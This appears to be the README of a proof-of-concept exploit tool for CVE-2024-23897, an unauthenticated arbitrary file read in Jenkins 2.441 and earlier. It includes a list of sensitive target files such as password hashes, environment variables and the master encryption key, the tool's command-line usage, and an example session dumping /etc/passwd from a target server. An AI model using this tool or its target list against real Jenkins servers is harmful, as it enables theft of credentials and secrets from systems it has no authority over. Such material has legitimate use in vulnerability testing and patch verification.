CVE-2024-23897

Description:

This Proof-of-Concept (POC) can be used to exploit CVE-2024-23897 to achieve file-read access on a Jenkins server <= version 2.441.

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an @ character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

Severity: 7.5 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

There is a severe limitation to this vulnerability, as binary files cannot be fully read. Some plaintext non-binary files that could be of interest:

• /proc/self/environ Environmental variables including JENKINS_HOME
• /proc/self/cmdline Command-line arguments
• /etc/hosts Linux local-DNS resolution
• /etc/passwd Linux user accounts
• /var/jenkins_home/users/users.xml User account storage locations
• /var/jenkins_home/users/<user_directory>/config.xml User BCrypt password hash
• /var/jenkins_home/secrets/master.key Encryption secret key

Usage:

usage: jenkins_fileread.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

Example

$ jenkins_fileread.py -u http://<target-ip>:8080
Welcome to the Jenkins file-read shell. Type help or ? to list commands.

file> /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

References

• NIST CVE-2024-23897
• Jenkins Security Advisory 2024-01-24
• Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins
• Breaking Down CVE-2024-23897: PoC Code Surfaces Just After Jenkins Advisory